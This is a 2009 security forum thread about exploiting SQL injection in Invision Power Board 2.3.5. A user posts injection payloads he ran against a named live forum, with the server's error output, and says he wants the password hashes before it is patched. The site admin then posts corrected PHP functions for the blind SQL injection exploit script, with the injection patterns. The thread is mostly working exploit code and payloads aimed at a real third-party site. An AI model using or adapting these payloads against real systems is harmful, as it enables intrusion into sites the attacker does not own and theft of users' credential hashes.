 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 178
 Members: 0
 Total: 178
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Please Help!! IPB 2.3.5 Exploit |
|
 Posted: Wed Jul 29, 2009 10:18 pm |
 |
|
| littlemc |
| Regular user |
 |
|
| Joined: Jul 29, 2009 |
| Posts: 13 |
|
|
|
 |
|
 |
|
hey i found a forum that gives me the IPS Driver Error.
but the exlpoit always says to me invalid url
when i try this
| Code: | | act=xmlout&do=check-display-name&name=whatever98321%2527+OR+1=1--+ |
i get
| Code: |
Warning: Cannot modify header information - headers already sent by (output started at /home/admin/domains/izra.co.il/public_html/forum/conf_global.php:31) in /home/admin/domains/izra.co.il/public_html/forum/ips_kernel/class_ajax.php on line 204
Warning: Cannot modify header information - headers already sent by (output started at /home/admin/domains/izra.co.il/public_html/forum/conf_global.php:31) in /home/admin/domains/izra.co.il/public_html/forum/ips_kernel/class_ajax.php on line 205
Warning: Cannot modify header information - headers already sent by (output started at /home/admin/domains/izra.co.il/public_html/forum/conf_global.php:31) in /home/admin/domains/izra.co.il/public_html/forum/ips_kernel/class_ajax.php on line 206
Warning: Cannot modify header information - headers already sent by (output started at /home/admin/domains/izra.co.il/public_html/forum/conf_global.php:31) in /home/admin/domains/izra.co.il/public_html/forum/ips_kernel/class_ajax.php on line 207
Warning: Cannot modify header information - headers already sent by (output started at /home/admin/domains/izra.co.il/public_html/forum/conf_global.php:31) in /home/admin/domains/izra.co.il/public_html/forum/ips_kernel/class_ajax.php on line 208
found |
when i try this
| Code: |
act=xmlout&do=check-display-name&name=whatever98321%2527+OR+1=1/* |
i get IPS Driver Error
and when i try this
| Code: | | act=xmlout&do=check-display-name&name=whatever98321%2527+OR+1=1%23 |
i aslo get the same as in the first
please help me |
|
|
|
|
|
|
|
|
| Posted: Thu Jul 30, 2009 7:26 am |
|
|
| littlemc |
| Regular user |
|
|
| Joined: Jul 29, 2009 |
| Posts: 13 |
|
|
|
|
|
|
|
any one here? XD
i afraid to lose this oprion they should patch it soon
i want to get the hashes ASAP |
|
|
|
|
| Posted: Thu Jul 30, 2009 9:50 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| littlemc wrote: | any one here? XD
i afraid to lose this oprion they should patch it soon
i want to get the hashes ASAP |
You need little change in exploit script. Instead of testing for equality with "found" or "notfound" use strpos() so that php warnings will not interfere.
Before:
| Code: |
if($buff === 'found')
{
$bret = true;
break;
}
elseif($buff === 'notfound')
{
break;
}
|
After:
| Code: |
if(strpos($buff, 'notfound') !== false)
{
$bret = false;
break;
}
elseif(strpos($buff, 'found') !== false)
{
$bret = true;
break;
}
|
|
|
|
|
|
| Posted: Thu Jul 30, 2009 5:37 pm |
|
|
| littlemc |
| Regular user |
|
|
| Joined: Jul 29, 2009 |
| Posts: 13 |
|
|
|
|
|
|
|
the result is still same
i edited in the test condition. |
|
|
|
|
| Posted: Thu Jul 30, 2009 5:54 pm |
|
|
| littlemc |
| Regular user |
|
|
| Joined: Jul 29, 2009 |
| Posts: 13 |
|
|
|
|
|
|
|
ok i got it but now he cant eget the id..
always "invalid return value " |
|
|
|
|
| Posted: Fri Jul 31, 2009 10:44 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| What exploit specifically you are using? What version? |
|
|
|
|
| Posted: Fri Jul 31, 2009 12:51 pm |
|
|
| littlemc |
| Regular user |
|
|
| Joined: Jul 29, 2009 |
| Posts: 13 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Fri Jul 31, 2009 1:48 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
I did tests and that exploit will work, if you change two functions:
| Code: |
function test_target_url()
{
global $url;
$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
$buff = trim(make_post($url, $post, '', $url));
if(strpos($buff, 'notfound') !== false)
{
die('Target is patched? Exiting ...');
}
if(strpos($buff, 'found') === false)
{
die('Invalid response, target URL not valid? Exiting ...');
}
}
|
| Code: |
function test_condition($p)
{
global $url;
$bret = false;
$maxtry = 10;
$try = 1;
$pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
$post = sprintf($pattern, $p);
while(1)
{
$buff = trim(make_post($url, $post, '', $url));
if(strpos($buff, 'notfound') !== false)
{
$bret = false;
break;
}
elseif(strpos($buff, 'found') !== false)
{
$bret = true;
break;
}
elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
{
die("Sql error! Wrong prefix?\nExiting ... ");
}
else
{
xecho("test_condition() - try $try - invalid return value ...\n");
//die("--$buff--");
$try ++;
if($try > $maxtry)
{
die("Too many tries - exiting ...\n");
}
else
{
xecho("Trying again - try $try ...\n");
}
}
}
return $bret;
}
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
